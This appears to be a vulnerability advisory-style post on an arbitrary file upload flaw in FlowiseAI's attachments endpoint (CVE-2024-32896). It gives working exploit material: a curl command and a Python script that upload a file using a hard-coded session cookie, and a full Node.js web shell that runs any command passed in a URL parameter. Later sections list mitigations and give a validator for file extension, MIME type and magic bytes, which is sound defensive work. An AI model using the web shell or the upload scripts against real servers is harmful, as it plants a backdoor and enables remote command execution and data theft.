FlowiseAI, Arbitrary File Upload, CVE-2024-32896 (Critical)

This vulnerability lies in the file upload functionality of FlowiseAI’s `/api/v1/attachments/` endpoint. The system uses the Multer middleware to handle `multipart/form-data` but lacks essential security validations: it does not check file extensions, MIME types, or the magic bytes of the uploaded file’s content. An authenticated attacker can send a POST request with a malicious JavaScript file, which Multer processes and places in a temporary directory. The application’s controller then calls a service-layer function, `createFileAttachment`, which moves the file from the temporary location to a permanent storage directory on the server’s filesystem. The function `addSingleFile` in the storage utilities is responsible for this final move operation.

Crucially, the only filtering performed is on the filename itself, where dangerous directory traversal sequences like `../` are sanitized, but no validation rejects files based on their type or content. This allows a Node.js web shell to be persistently stored. While the shell does not execute automatically, its presence on the server creates a persistent backdoor. The shell can then be triggered by an administrator accessing it inadvertently, or via a separate vulnerability chained to achieve remote code execution, as the shell exposes an HTTP endpoint that can run arbitrary system commands.

Platform: FlowiseAI
Version: < 1.4.3

Vulnerability: Arbitrary File Upload

Severity: Critical

Date: 2024-08-21

Prediction: 2024-09-04

What Undercode Say:

```bash
curl -X POST "http://localhost:3000/api/v1/attachments/0237eefc-18c5-46b2-8b3c-97aa516133fc/$(uuidgen)" -H "Cookie: jwt=ppBk33uGXmJmoj8zIAGgHOP-oQfb2b8yds7XQfqyRl0" -F "files=@shell.js"
```

```javascript
// shell.js: the file uploaded in the request above
const { exec } = require('child_process');
const http = require('http');

const server = http.createServer((req, res) => {
  const url = new URL(req.url, 'http://localhost');
  const cmd = url.searchParams.get('cmd');
  if (cmd) {
    // Runs the value of the "cmd" query parameter as a system command
    exec(cmd, (error, stdout, stderr) => {
      res.writeHead(200, {'Content-Type': 'text/plain'});
      if (error) {
        res.end(`Error: ${error.message}\n${stderr || ''}`);
      } else {
        res.end(stdout || 'Command executed successfully');
      }
    });
  } else {
    res.writeHead(200, {'Content-Type': 'text/html'});
    res.end('<h1>Node.js Web Shell</h1>');
  }
});
server.listen(8888, '0.0.0.0');
```

```python
import requests
import uuid

# Same upload as the curl request, sent with the requests library
url = f"http://localhost:3000/api/v1/attachments/0237eefc-18c5-46b2-8b3c-97aa516133fc/{str(uuid.uuid4())}"
headers = {'Cookie': 'jwt=ppBk33uGXmJmoj8zIAGgHOP-oQfb2b8yds7XQfqyRl0'}
with open('shell.js', 'rb') as fh:
    files = {'files': ('shell.js', fh, 'application/javascript')}
    r = requests.post(url, headers=headers, files=files)
```

How the Exploit Works:

Authenticated file upload.

Web shell persistence.

Trigger for RCE.

Protection from this CVE:

Update to v1.4.3.

Implement file-type validation.

Restrict executable directories.
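
One way to implement the file-type validation listed above, shown as an added example and not FlowiseAI's own code or its patch. It checks the three things the description says were missing (extension, declared MIME type, magic bytes) on an object shaped like a Multer in-memory upload; `ALLOWED`, `validateUpload`, `demo` and the allowlist contents are assumptions made for illustration.

```javascript
// Added example: allowlist validation for an upload object shaped like
// Multer's memory-storage result ({ originalname, mimetype, buffer }).
// Names and the allowlist are hypothetical, not taken from FlowiseAI.
const ALLOWED = new Map([
  ['.png', { mime: 'image/png', magic: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] }],
  ['.jpg', { mime: 'image/jpeg', magic: [0xff, 0xd8, 0xff] }],
  ['.pdf', { mime: 'application/pdf', magic: [0x25, 0x50, 0x44, 0x46, 0x2d] }], // "%PDF-"
]);

function validateUpload(file) {
  const name = String(file.originalname || '');
  // Reject path separators and NUL outright instead of rewriting the name.
  if (/[\\\/\0]/.test(name)) return { ok: false, reason: 'path characters in filename' };

  // 1. Extension must be on the allowlist (deny by default).
  const dot = name.lastIndexOf('.');
  const ext = dot > 0 ? name.slice(dot).toLowerCase() : '';
  const rule = ALLOWED.get(ext);
  if (!rule) return { ok: false, reason: `extension not allowed: ${ext || '(none)'}` };

  // 2. Client-declared MIME type must agree with the extension.
  if (file.mimetype !== rule.mime) {
    return { ok: false, reason: 'declared MIME type does not match extension' };
  }

  // 3. Leading bytes of the content must match the type's signature.
  const head = file.buffer.subarray(0, rule.magic.length);
  const matches = head.length === rule.magic.length &&
    rule.magic.every((byte, i) => head[i] === byte);
  if (!matches) return { ok: false, reason: 'content does not match declared type' };

  return { ok: true, ext };
}

// Constructed sample uploads: a script, a script renamed to .png, a PNG header.
function demo() {
  const script = Buffer.from("const http = require('http');");
  const png = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0, 0, 0, 0x0d]);
  return [
    validateUpload({ originalname: 'shell.js', mimetype: 'application/javascript', buffer: script }),
    validateUpload({ originalname: 'shell.png', mimetype: 'image/png', buffer: script }),
    validateUpload({ originalname: 'chart.PNG', mimetype: 'image/png', buffer: png }),
  ];
}
```

A signature check only inspects the start of the file, so it complements the storage restriction in the next item on the list; it does not replace it.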

Impact:

Remote Code Execution.

System compromise.

Data breach.

Sources:

Reported By: github.com